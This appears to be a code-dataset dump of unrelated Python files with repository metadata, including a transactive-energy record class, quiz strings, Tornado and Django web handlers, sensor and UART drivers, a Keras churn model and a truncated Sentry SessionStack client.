| 2021-04-19T20:15:45
| null |
UTF-8
|
Python
| false
| false
| 4,505
|
py
|
"""
Copyright (c) 2020, Battelle Memorial Institute
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those
of the authors and should not be interpreted as representing official policies,
either expressed or implied, of the FreeBSD Project.
This material was prepared as an account of work sponsored by an agency of the
United States Government. Neither the United States Government nor the United
States Department of Energy, nor Battelle, nor any of their employees, nor any
jurisdiction or organization that has cooperated in the development of these
materials, makes any warranty, express or implied, or assumes any legal
liability or responsibility for the accuracy, completeness, or usefulness or
any information, apparatus, product, software, or process disclosed, or
represents that its use would not infringe privately owned rights.
Reference herein to any specific commercial product, process, or service by
trade name, trademark, manufacturer, or otherwise does not necessarily
constitute or imply its endorsement, recommendation, or favoring by the
United States Government or any agency thereof, or Battelle Memorial Institute.
The views and opinions of authors expressed herein do not necessarily state or
reflect those of the United States Government or any agency thereof.
PACIFIC NORTHWEST NATIONAL LABORATORY
operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
under Contract DE-AC05-76RL01830
"""
from datetime import datetime
from .time_interval import TimeInterval
from .helpers import format_ts
class TransactiveRecord:
def __init__(self, ti, rn, mp, p, pu=0.0, cost=0.0, rp=0.0, rpu=0.0, v=0.0, vu=0.0):
# NOTE: As of Feb 2018, ti is forced to be text, the time interval name,
# not a TimeInterval object.
# ti - TimeInterval object (that must be converted to its name)
# rn - record number, a nonzero integer
# mp - marginal price [$/kWh]
# p - power [avg.kW]
# These are the four normal arguments of the constructor.
# NOTE: Use the time interval ti text name, not a TimeInterval object itself.
if isinstance(ti, TimeInterval):
# A TimeInterval object argument must be represented by its text name.
self.timeInterval = ti.name
else:
# Argument ti is most likely received as a text string name. Further
# validation might be used to make sure that ti is a valid name of an
# active time interval.
self.timeInterval = ti
self.record = rn # a record number (0 refers to the balance point)
self.marginalPrice = mp # marginal price [$/kWh]
self.power = p # power [avg.kW]
# Source and target are obvious from Neighbor and filenames. Omit
# self.powerUncertainty = pu # relative [dimensionless]
self.cost = cost # ?
# self.reactivePower = rp # [avg.kVAR]
# self.reactivePowerUncertainty = rpu # relative [dimensionless]
# self.voltage = v # [p.u.]
# self.voltageUncertainty = vu # relative [dimensionless]
# Finally, create the timestamp that captures when the record is created.
self.timeStamp = datetime.utcnow()
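# Minimal usage sketch (hedged): constructs one record with hypothetical values,
# relying only on the constructor defined above. The interval name format below is
# illustrative, not something this class prescribes.
if __name__ == '__main__':
    example_record = TransactiveRecord(ti='201808091300', rn=1, mp=0.035, p=12.5)
    print(example_record.timeInterval, example_record.record,
          example_record.marginalPrice, example_record.power, example_record.timeStamp)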
|
[
"shwetha.niddodi@pnnl.gov"
] |
shwetha.niddodi@pnnl.gov
|
dcad9b56560d0941b2a0e5ed5d3b3e2336da3c37
|
0785df5c1d893a23a77b73617c1b5c10e6ac238f
|
/local.py
|
7dd3a4cb48cf307e906381640d9a3d04ea3eccd3
|
[] |
no_license
|
AnufrievaAnastasia/Project3
|
dd9482b2c1cb1722c4a1bcfd69f8c3f8210b7fbf
|
237bf9f9c04704a2e8a22ac4088d4ad805f8eeac
|
refs/heads/master
| 2020-08-23T05:03:21.903122
| 2019-10-21T11:21:05
| 2019-10-21T11:21:05
| 216,549,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
TXT_TASK = 'The game "Truth or Lie"; you have only two attempts to get through'
TXT_ANS_1 = 'The hardest natural material on Earth is titanium '
TXT_ANS_2 = 'On average, a person spends about 10 years asleep '
TXT_ANS_3 = 'Dragonflies are the fastest-flying insects '
TXT_ANS_4 = 'The film "Titanic" cost more than the construction of the ship itself did in its day, adjusted for inflation '
TXT_ANS_5 = 'In Norway, a penguin was knighted '
TXT_ANS_6 = 'Ants sleep in the morning '
TXT_ANS_7 = 'Carambola is a saltwater fish '
TXT_ANS_8 = 'An ignoramus is an ill-mannered and rude person '
TXT_ANS_9 = 'In New Zealand, sign language has the status of an official language '
TXT_ANS_10 = 'Dell is an American corporation in the field of computer manufacturing '
TXT_TRUE = 'truth'
TXT_FALSE = 'lie'
TXT_END = 'The game is OVER!'
TXT_WIN = 'You WIN!'
|
[
"anufrieva_01@mail.ru"
] |
anufrieva_01@mail.ru
|
fc6660d4b5263329f3ba30e3115d2c3f11ba7cdc
|
36a5fb4183534c1f7e2523a80c510c4d59746fe9
|
/sgs/cmd_handlers.py
|
7bc5a5e76f1656a7f16962450eba8dd8fac19ae0
|
[] |
no_license
|
morningbzy/SGS
|
85856ce313a404430fab7fffc5dfc5f9603feaab
|
23db709af3e56d6082c8283ea2fd6f0caf10e85e
|
refs/heads/master
| 2021-01-15T13:18:19.315256
| 2013-08-07T15:38:39
| 2013-08-07T15:38:39
| 10,073,280
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,143
|
py
|
# -*- coding: UTF-8 -*-
import logging
import tornado.escape
import tornado.auth
import tornado.web
from sgs.user import global_users
from sgs.game import global_game
from sgs.cmd import Cmd
class BaseHandler(tornado.web.RequestHandler):
def get_current_user(self):
user_json = self.get_secure_cookie("user")
if not user_json:
return None
return tornado.escape.json_decode(user_json)
class AuthLoginHandler(BaseHandler):
def get(self):
self.render("login.html")
def post(self):
name = self.get_argument("name")
user_dict = {'pk': name, 'name': name}
if global_users.has_user(name):
# TODO: 恢复用户状态
self.redirect("/auth/login")
else:
global_users.add_user(**user_dict)
self.set_secure_cookie("user", tornado.escape.json_encode(user_dict))
self.redirect("/")
#class AuthLoginHandler(BaseHandler, tornado.auth.GoogleMixin):
# @tornado.web.asynchronous
# @gen.coroutine
# def get(self):
# if self.get_argument("openid.mode", None):
# user = yield self.get_authenticated_user()
# user_dict = tornado.escape.json_encode(user)
# self.set_secure_cookie("sgs_user", user_dict)
# self.redirect("/")
# return
# self.authenticate_redirect(ax_attrs=["name"])
class AuthLogoutHandler(BaseHandler):
def get(self):
self.clear_cookie("user")
self.write("You are now logged out")
class IndexHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
if not self.current_user\
or not global_users.has_user(self.current_user['pk']):
self.redirect('/auth/login')
else:
self.render("game.html")
class SgsCmdRequestHandler(BaseHandler):
@tornado.web.authenticated
def post(self):
cmd_args = self.request.arguments
cmd_args.pop('_xsrf', None)
cmd = cmd_args.pop('cmd')[0]
cmd_args = dict([(k, v[0]) if len(v) == 1 else v
for k, v in cmd_args.iteritems()])
user = global_users.get_user(self.current_user['pk'])
if user.seat_id is not None and 'seat_id' not in cmd_args:
cmd_args['seat_id'] = user.seat_id
cmd = Cmd(cmd, sender=user.pk, **cmd_args)
logging.info('<-- [%s] %s' % (cmd, cmd_args))
self.write(dict(cmds=[cmd.get_ack_cmd().to_simple_dict()]))
global_game.handle_cmd(cmd)
#global_users.broadcast_cmd(cmd)
@tornado.web.authenticated
@tornado.web.asynchronous
def get(self):
user_dict = self.get_current_user()
user = global_users.get_user(user_dict['pk'])
if user:
user.get_cmds(self.on_new_cmd)
else:
self.write(dict(cmds=[]))
def on_new_cmd(self, cmds):
# Closed client connection
if self.request.connection.stream.closed():
user = global_users.get_user(self.get_current_user()['pk'])
user.resend_cmd(cmds)
return
self.finish(dict(cmds=[cmds.to_simple_dict()]))
|
[
"morningbzy@gmail.com"
] |
morningbzy@gmail.com
|
405974db9681a1efc9bb65d55fa0ae64ee33d230
|
94470cf07f402b1c7824e92a852cd3203f94ac4a
|
/polls/apiviews.py
|
6f6ca88b9da4638cbf0f4888e4305f24fa9ffee5
|
[] |
no_license
|
jbeltranleon/pollsapi_django_rest
|
c509bf0b0c1e2db870ed8a4aaa1647bf74c5f8cd
|
0855820541064ffd77dbd1c6e77f695d4f18e517
|
refs/heads/master
| 2020-04-14T17:55:02.364183
| 2019-01-04T16:01:46
| 2019-01-04T16:01:46
| 163,999,126
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,203
|
py
|
from rest_framework import generics
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from .models import Poll, Choice
from .serializers import PollSerializer, ChoiceSerializer,\
VoteSerializer
class PollList(generics.ListCreateAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class PollDetail(generics.RetrieveDestroyAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class ChoiceList(generics.ListCreateAPIView):
def get_queryset(self):
queryset = Choice.objects.filter(poll_id=self.kwargs["pk"])
return queryset
serializer_class = ChoiceSerializer
class CreateVote(APIView):
def post(self, request, pk, choice_pk):
voted_by = request.data.get("voted_by")
data = {'choice': choice_pk, 'poll': pk, 'voted_by': voted_by}
serializer = VoteSerializer(data=data)
if serializer.is_valid():
vote = serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
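# Minimal usage sketch (hedged): drives CreateVote through DRF's request factory.
# The URL string and primary keys are placeholders, and a configured Django project
# with existing Poll/Choice rows is assumed.
from rest_framework.test import APIRequestFactory
def _vote_example():
    factory = APIRequestFactory()
    request = factory.post('/polls/1/choices/1/vote/', {'voted_by': 1})
    response = CreateVote.as_view()(request, pk=1, choice_pk=1)
    return response.status_code  # 201 on success, 400 on validation errors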
|
[
"jbeltranleon@gmail.com"
] |
jbeltranleon@gmail.com
|
cdf669514aaf2c1d7c33248746135d7b0232f29f
|
184ab7b1f5d6c4a4382cf4ffcf50bbad0f157ef1
|
/library/aht10/aht10_example.py
|
46df77a8a71666025fda1409a3c5b7ebdbed9497
|
[] |
no_license
|
RT-Thread/mpy-snippets
|
fdd257bb9f44cdc92e52cd39cdc88a57d736fb26
|
9296d559da275f51845cb9c2f8e2010f66f72cc1
|
refs/heads/master
| 2023-06-14T02:20:05.449559
| 2020-06-03T02:34:47
| 2020-06-03T02:35:19
| 198,854,793
| 28
| 18
| null | 2020-05-06T11:32:46
| 2019-07-25T15:14:56
|
Python
|
UTF-8
|
Python
| false
| false
| 517
|
py
|
from machine import I2C, Pin
from aht10 import AHT10
PIN_CLK = 54 # PD6, get the pin number from get_pin_number.py
PIN_SDA = 33 # PC1
clk = Pin(("clk", PIN_CLK), Pin.OUT_OD) # Select the PIN_CLK as the clock
sda = Pin(("sda", PIN_SDA), Pin.OUT_OD) # Select the PIN_SDA as the data line
i2c = I2C(-1, clk, sda, freq=100000)
sensor = AHT10(i2c)
sensor.sensor_init()
sensor.is_calibration_enabled()
print("current temp: %.2f "%sensor.read_temperature())
print("current humi: %.2f %%"%sensor.read_humidity())
|
[
"SummerGift@qq.com"
] |
SummerGift@qq.com
|
86404a656d1321585c146107b8e2b33929d19370
|
809f119d53610261d71c5e9b5f620c41524868b1
|
/main.py
|
eb0ecb4bd43e420c3f19ab15dbdcc22cd75d1cd5
|
[] |
no_license
|
HackerulGogu/SnakeImpact
|
d07c9866ec8b4320c393b24fbd47793e0c03a140
|
c6c65f9e1de5cc446a56340ac0462cc4ed362b75
|
refs/heads/master
| 2021-04-11T04:19:15.420141
| 2020-03-21T14:51:55
| 2020-03-21T14:51:55
| 248,991,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15
|
py
|
print('merge')
|
[
"novaialex44@gmail.com"
] |
novaialex44@gmail.com
|
ecf5f0f62c51ab6359317746fd5f24df8967cb26
|
d268ee5da12d4eecc7bf97f37ec71ae58fe5854d
|
/data_set_prep/dataset_prep_scr.py
|
0cc7adb12c263a0b1b7b24868476e42d26b4213b
|
[] |
no_license
|
oiynick/rcnn_buildings
|
b5760727fc0063086362eaffe32e36e2fafc75e7
|
1be3d554e5e3a0bc13ed086c73f3a87f61e025d5
|
refs/heads/master
| 2020-04-28T08:57:19.537442
| 2019-03-21T12:54:29
| 2019-03-21T12:54:29
| 175,148,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,222
|
py
|
import numpy as np
import shapely.geometry
from aeronet import dataset as ds
def one_sample(fp_json, fp_tif):
# Read the JSON file and the TIF image
av_features = ds.vector.FeatureCollection.read(fp_json)
raster = ds.raster.Band(fp_tif)
# Image sizing info and setting up the coordinates
samples = raster.generate_samples(512, 512)
for i in samples:
# Taking bounds of the generated sample
bounds = i.bounds
# Create a shape of the polygon
        area = shapely.geometry.Polygon((bounds.min_point + bounds.max_point))
# Create a feature based on a shape
a_feature = ds.vector.Feature(area)
# Find the intersecting features
inter = av_features.intersection(a_feature)
# For every feature make a feature collection and raster data
for feature in inter:
offc = ds.vector.FeatureCollection(feature)
rasta = ds.transforms.rasterize(offc, i.transform, (512, 512))
yield rasta
def main():
amount = 1
    res = np.empty(amount, dtype=object)
for i in range(amount):
fp_tif = '{}.tif'.format(i)
fp_json = '{}.json'.format(i)
res[i] = one_sample(fp_json, fp_tif)
|
[
"nikita.veliev@skoltech.ru"
] |
nikita.veliev@skoltech.ru
|
68ed6146980626889998a60eed343f5932d5d1a2
|
7e792f54abea89609fcc1317dbbc6b50012c56ec
|
/main.py
|
a360c9b3b6cb6ff0e81fd6148244159ed17ed374
|
[] |
no_license
|
sylvanusm/Bert-abstractive-summarisation
|
067ba2a53ae8a2d5e99f5024c77f29b52eadd39d
|
4e56bf0b2188b9684f4b1c2d59e60c5f6b8c090e
|
refs/heads/main
| 2023-06-07T17:19:47.812248
| 2021-06-26T10:28:52
| 2021-06-26T10:28:52
| 380,363,935
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,647
|
py
|
from model.transformer import Summarizer
from model.common_layer import evaluate
from utils import config
import torch
import wandb
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
import os
import time
import numpy as np
from utils.data import get_dataloaders, InputExample, InputFeatures
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def train_draft():
train_dl, val_dl, test_dl, tokenizer = get_dataloaders(is_small=config.small)
if(config.test):
print("Test model",config.model)
model = Transformer(model_file_path=config.save_path,is_eval=True)
        evaluate(model,test_dl,model_name=config.model,ty='test')
exit(0)
model = Summarizer(is_draft=True, toeknizer=tokenizer)
print("TRAINABLE PARAMETERS",count_parameters(model))
print("Use Cuda: ", config.USE_CUDA)
best_rouge = 0
cnt = 0
eval_iterval = 300
wandb.init(project=config.experiment, config={
"model_name": config.model_name,
"learning_rate": config.lr,
"batch_size": config.batch_size,
"hop": config.hop,
"heads": config.heads,
"epochs": config.epochs,
"beam_size": config.beam_size,
"emb_dim": config.emb_dim,
'cuda': config.USE_CUDA
})
conf = wandb.config
for e in range(config.epochs):
# model.train()
print("Epoch", e)
l = []
pbar = tqdm(enumerate(train_dl),total=len(train_dl))
for i, d in pbar:
loss = model.train_one_batch(d)
l.append(loss.item())
pbar.set_description("TRAIN loss:{:.4f}".format(np.mean(l)))
if i%eval_iterval==0:
# model.eval()
loss,r_avg, r1, r2, rl = evaluate(model,val_dl,model_name=config.model,ty="train")
wandb.log({"epoch": e,
"loss":loss,
"r_avg":r_avg,
"r1":r1,
"r2":r2,
"rl":rl})
            # each epoch is long, so just do early stopping here.
if(r_avg > best_rouge):
best_rouge = r_avg
cnt = 0
model.save_model(loss,e,r_avg)
else:
cnt += 1
if(cnt > 20): break
# model.train()
# model.eval()
loss,r_avg, r1, r2, rl = evaluate(model,val_dl,model_name=config.model,ty="valid")
wandb.finish()
if __name__ == "__main__":
train_draft()
|
[
"sylvanusmahe@Sylvanuss-MacBook-Pro.local"
] |
sylvanusmahe@Sylvanuss-MacBook-Pro.local
|
4d1858de9f200007868855912c5cb09bbd0ff480
|
b99255c89683d4123a560a1eb6221b21013d917d
|
/path_manager/page/category_page.py
|
f51ce67d375f686b79ed3751f06300e58f94fc61
|
[
"MIT"
] |
permissive
|
sweetcolor/internet_market_scraper
|
f7a89e8c54124aadfecaa89f1c84d6c73762ff8b
|
f7eb8c9ade2c0a956ba5d5b7e6173010c85afed6
|
refs/heads/master
| 2021-09-04T04:05:46.529150
| 2018-01-15T17:02:59
| 2018-01-15T17:02:59
| 115,523,578
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 156
|
py
|
from path_manager.page.page import Page
class CategoryPage(Page):
def __init__(self, link, parent_page):
super().__init__(link, parent_page)
|
[
"sweet3color@gmail.com"
] |
sweet3color@gmail.com
|
8dffd82bcaecce6cabc8c75ad494f05fdb50eb2c
|
463b1807820b9fa119e0c17afaa06840fef0e2a3
|
/TURTLE/Rainbow.py
|
c1cd2fce89f6b3134ecc681a44f9b1183f16a2cc
|
[] |
no_license
|
ferdi-oktavian/Python
|
ad8aac711d5565739077a6e5358777807dd464d3
|
27ad83aeedb3e460927bfcf179bc4e4b1ed28366
|
refs/heads/main
| 2023-03-09T02:49:54.481087
| 2021-03-02T00:12:54
| 2021-03-02T00:12:54
| 343,593,542
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
import turtle
import colorsys
def draw_one_color_arc(x, y, r, pensize, color):
turtle.up();turtle.goto(x+r,y)
turtle.down();turtle.seth(90)
turtle.pensize(pensize);turtle.pencolor(color)
turtle.circle(r,180)
turtle.speed(0)
turtle.hideturtle()
turtle.bgcolor('light blue')
turtle.title('rainboww')
turtle.setup(700, 700)
num_colors = 49
radius = 400
penwidth = 20 * 7 / num_colors
hue = 0
for i in range(num_colors):
(r, g, b) = colorsys.hsv_to_rgb(hue,1,1)
draw_one_color_arc(0, -100,radius,penwidth,(r,g,b))
radius -= (penwidth-1)
hue += 0.9/num_colors
turtle.getscreen()._root.mainloop()
|
[
"noreply@github.com"
] |
ferdi-oktavian.noreply@github.com
|
9907349705be2a4fdbc48e95c52054b00ad85246
|
4efcfcaec6cc956d15a1ae966905911809c4de18
|
/Supervised Deep Learning/Artificial Neural Networks (ANN)/artificial_neural_network.py
|
72ded64f7630ebf2867544dae348d8c8a1fe4aa0
|
[
"BSD-3-Clause"
] |
permissive
|
Nikhil-Xavier-DS/Deep-Learning-Algorithms-KERAS
|
9aa54eebaf688d83efa13767dd0e378339774e9c
|
7bbda3b1495d2e377abef2938c193afd34d95038
|
refs/heads/master
| 2020-03-28T09:00:22.535353
| 2018-09-09T08:30:32
| 2018-09-09T08:30:32
| 148,006,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,994
|
py
|
# Artificial Neural Network
# Import libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Import Dataset
dataset = pd.read_csv('Churn_Modelling.csv')
X = dataset.iloc[:,3: 13].values
y = dataset.iloc[:,13].values
# Encoding categorical data
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_X_1 = LabelEncoder()
X[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])
labelencoder_X_2 = LabelEncoder()
X[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])
onehotencoder = OneHotEncoder(categorical_features = [1])
X = onehotencoder.fit_transform(X).toarray()
X = X[:, 1:]
# Splitting into training set & test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature scaling
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
# Let us make ANN
# Import Keras library
import keras
from keras.models import Sequential
from keras.layers import Dense
# Initializing ANN
classifier = Sequential()
# Adding Input layer and First hidden layer
classifier.add(Dense(output_dim = 6, init = 'uniform', activation = 'relu', input_dim = 11))
# Adding Second hidden layer
classifier.add(Dense(output_dim = 6, init = 'uniform', activation = 'relu'))
# Adding Output layer
classifier.add(Dense(output_dim = 1, init = 'uniform', activation = 'sigmoid'))
# Compiling ANN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Fit ANN to training set
classifier.fit(X_train, y_train, batch_size = 10, epochs = 100)
# Predict and evaluate model
y_pred = classifier.predict(X_test)
for i in range(0, len(y_pred)):
if(y_pred[i] >= 0.5):
y_pred[i] = True
else:
y_pred[i] = False
# Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
cm
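# Quick sanity check (a sketch): overall accuracy read off the 2x2 confusion matrix
# above, where rows are true classes and columns are predicted classes.
accuracy = float(cm[0, 0] + cm[1, 1]) / cm.sum()
print("Test set accuracy: {:.3f}".format(accuracy))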
|
[
"nikhilxavier@yahoo.com"
] |
nikhilxavier@yahoo.com
|
31508bdac6628284abbbd3294418d6af5c325c67
|
b8d5270f2af049e795d02887fbe322054b82f600
|
/SC16IS750.py
|
28bdf44a54e2501340f0142873eca248d24d6733
|
[] |
no_license
|
Harri-Renney/SC16IS750
|
1d73c42aa7fbec05413d7c2e7ea4fca2477e799c
|
8da36a31ca930ea88af2e73cce6ea163bda3ba25
|
refs/heads/master
| 2021-08-18T05:26:22.753747
| 2020-03-26T20:58:12
| 2020-03-26T20:58:12
| 141,274,557
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,484
|
py
|
import smbus
from enum import IntEnum
class SC16IS750:
    DEVICE_ADDRESS = 0x9A
    crystalFrequency = 0
class registers(IntEnum):
RHR= 0x00 # Receive Holding Register (R)
THR= 0x00 # Transmit Holding Register (W)
IER= 0x01 # Interrupt Enable Register (R/W)
FCR= 0x02 # FIFO Control Register (W)
IIR= 0x02 # Interrupt Identification Register (R)
LCR= 0x03 # Line Control Register (R/W)
MCR= 0x04 # Modem Control Register (R/W)
LSR= 0x05 # Line Status Register (R)
MSR= 0x06 # Modem Status Register (R)
SPR= 0x07 # Scratchpad Register (R/W)
TCR= 0x06 # Transmission Control Register (R/W)
TLR= 0x07 # Trigger Level Register (R/W)
TXLVL = 0x08 # Transmit FIFO Level Register (R)
RXLVL = 0x09 # Receive FIFO Level Register (R)
IODIR= 0x0A # I/O pin Direction Register (R/W)
IOSTATE= 0x0B # I/O pin States Register (R)
IOINTENA= 0x0C # I/O Interrupt Enable Register (R/W)
IOCONTROL= 0x0E # I/O pins Control Register (R/W)
EFCR= 0x0F # Extra Features Register (R/W)
# -- Special Register Set (Requires LCR[7] = 1 & LCR != 0xBF to use)
DLL= 0x00 # Divisor Latch LSB (R/W)
DLH= 0x01 # Divisor Latch MSB (R/W)
# -- Enhanced Register Set (Requires LCR = 0xBF to use)
EFR= 0x02 # Enhanced Feature Register (R/W)
XON1= 0x04 # XOn1 (R/W)
XON2= 0x05 # XOn2 (R/W)
XOFF1= 0x06 # XOff1 (R/W)
XOFF2= 0x07 # XOff2 (R/W)
def init(self, crystalFrequency, deviceaddress=0x9A):
print("Initalising SC16IS750.")
self.DEVICE_ADDRESS = deviceaddress
self.bus = smbus.SMBus(1)
self.crystalFrequency = crystalFrequency
# def __init__():
def readRegister(self, registerAddress):
shiftedDeviceAddress = self.DEVICE_ADDRESS >> 1
shiftedRegisterAddress = registerAddress << 3
registerReadValue = self.bus.read_byte_data(shiftedDeviceAddress, shiftedRegisterAddress)
return registerReadValue
def writeRegister(self, registerAddress, data):
shiftedDeviceAddress = self.DEVICE_ADDRESS >> 1
shiftedRegisterAddress = registerAddress << 3
self.bus.write_byte_data(shiftedDeviceAddress, shiftedRegisterAddress, data)
##Set the desired baudrate of chips UART##
def setBaudrate(self, baudrate):
clockDivisor = (self.readRegister(self.registers.MCR) & 0b10000000) >> 7
if(clockDivisor == 0):
prescaler = 1
elif(clockDivisor == 1):
prescaler = 4
divisor = int((self.crystalFrequency / prescaler) / (baudrate * 16))
lowerDivisor = (divisor & 0xFF)
higherDivisor = (divisor & 0xFF00) >> 8
self.setRegisterBit(self.registers.LCR, 7)
self.writeRegister(self.registers.DLL, lowerDivisor)
self.writeRegister(self.registers.DLH, higherDivisor)
self.unsetRegisterBit(self.registers.LCR, 7)
##Set the desired UART attributes##
def setUARTAttributes(self, dataBits, parityType, stopBits):
#Calculate bits for LCR register#
print("Setting UART attributes.")
##Set the bit in position passed##
def setRegisterBit(self, registerAddress, registerBit):
current = self.readRegister(registerAddress)
updated = current | (1 << registerBit)
self.writeRegister(registerAddress, updated)
##Unset the bit in position passed##
def unsetRegisterBit(self, registerAddress, registerBit):
current = self.readRegister(registerAddress)
updated = current & ~(1 << registerBit)
self.writeRegister(registerAddress, updated)
##Checks if any data in FIFO buffer##
def isDataWaiting(self):
register = self.readRegister(self.registers.LSR)
isWaiting = register & 0b1
if(isWaiting):
return True
return False
##Checks number of bytes waiting in FIFO buffer##
def dataWaiting(self):
return self.readRegister(self.registers.RXLVL)
##Writes to Scratch register and checks successful##
def testChip(self):
self.writeRegister(self.registers.SPR, 0xFF)
if(self.readRegister(self.registers.SPR) != 0xFF):
return False
return True
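# Minimal usage sketch (hedged): assumes the chip is reachable on I2C bus 1 at the
# default address used above and a hypothetical 14.7456 MHz crystal.
if __name__ == "__main__":
    uart = SC16IS750()
    uart.init(crystalFrequency=14745600)
    if not uart.testChip():
        raise RuntimeError("SC16IS750 scratchpad test failed")
    uart.setBaudrate(9600)
    if uart.isDataWaiting():
        print("bytes waiting in RX FIFO:", uart.dataWaiting())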
|
[
"harri.renney@blino.co.uk"
] |
harri.renney@blino.co.uk
|
e2e44ffd1b8897513aaba446dd704ac14b2c5945
|
35dbd536a17d7127a1dd1c70a2903ea0a94a84c2
|
/src/sentry_plugins/sessionstack/client.py
|
2c50f1bafe960bbe0331c77cff05e234168642de
|
[
"Apache-2.0",
"BUSL-1.1"
] |
permissive
|
nagyist/sentry
|
efb3ef642bd0431990ca08c8296217dabf86a3bf
|
d9dd4f382f96b5c4576b64cbf015db651556c18b
|
refs/heads/master
| 2023-09-04T02:55:37.223029
| 2023-01-09T15:09:44
| 2023-01-09T15:09:44
| 48,165,782
| 0
| 0
|
BSD-3-Clause
| 2022-12-16T19:13:54
| 2015-12-17T09:42:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,683
|
py
|
import requests
from sentry.http import safe_urlopen
from sentry.utils import json
from .utils import add_query_params, get_basic_auth, remove_trailing_slashes
ACCESS_TOKEN_NAME = "Sentry"
DEFAULT_SENTRY_SOURCE = "sentry"
API_URL = "https://api.sessionstack.com"
PLAYER_URL = "https://app.sessionstack.com/player"
WEBSITES_ENDPOINT = "/v1/websites/{}"
SESSION_ENDPOINT = "/v1/websites/{}/sessions/{}"
ACCESS_TOKENS_ENDPOINT = "/v1/websites/{}/sessions/{}/access_tokens"
SESSION_URL_PATH = "/#/sessions/"
MILLISECONDS_BEFORE_EVENT = 5000
class SessionStackClient:
def __init__(self, account_email, api_token, website_id, **kwargs):
self.website_id = website_id
api_url = kwargs.get("api_url") or API_URL
self.api_url = remove_trailing_slashes(api_url)
player_url = kwargs.get("player_url") or PLAYER_URL
self.player_url = remove_trailing_slashes(player_url)
self.request_headers = {
"Authorization": get_basic_auth(account_email, api_token),
"Content-Type": "application/json",
}
def validate_api_access(self):
website_endpoint = WEBSITES_ENDPOINT.format(self.website_id)
try:
response = self._make_request(website_endpoint, "GET")
except requests.exceptions.ConnectionError:
raise InvalidApiUrlError
if response.status_code == requests.codes.UNAUTHORIZED:
raise UnauthorizedError
elif response.status_code == requests.codes.BAD_REQUEST:
raise InvalidWebsiteIdError
elif response.status_code == requests.codes.NOT_FOUND:
raise InvalidApiUrlError
response.raise_for_status()
def get_session_url(self, session_id, event_timestamp):
player_url = self.player_url + SESSION_URL_PATH + session_id
query_params = {}
query_params["source"] = DEFAULT_SENTRY_SOURCE
access_token = self._get_access_token(session_id)
if access_token is not None:
query_params["access_token"] = access_token
if event_timestamp is not None:
start_timestamp = self._get_session_start_timestamp(session_id)
if start_timestamp is not None:
pause_at = event_timestamp - start_timestamp
play_from = pause_at - MILLISECONDS_BEFORE_EVENT
query_params["pause_at"] = pause_at
query_params["play_from"] = play_from
return add_query_params(player_url, query_params)
def _get_access_token(self, session_id):
access_token = self._create_access_token(session_id)
if not access_token:
access_token = self._get_existing_access_token(session_id)
return access_token
def _get_existing_access_token(self, session_id):
response = self._make_access_tokens_request(session_id, "GET")
if response.status_code != requests.codes.OK:
return None
access_tokens = json.loads(response.content).get("data")
for token in access_tokens:
token_name = token.get("name")
if token_name == ACCESS_TOKEN_NAME:
return token.get("access_token")
return None
def _create_access_token(self, session_id):
response = self._make_access_tokens_request(
session_id=session_id, method="POST", body={"name": ACCESS_TOKEN_NAME}
)
if response.status_code != requests.codes.OK:
return None
return json.loads(response.content).get("access_token")
def _make_access_tokens_request(self, session_id, method, **kwargs):
access_tokens_endpoint = self._get_access_tokens_endpoint(session_id)
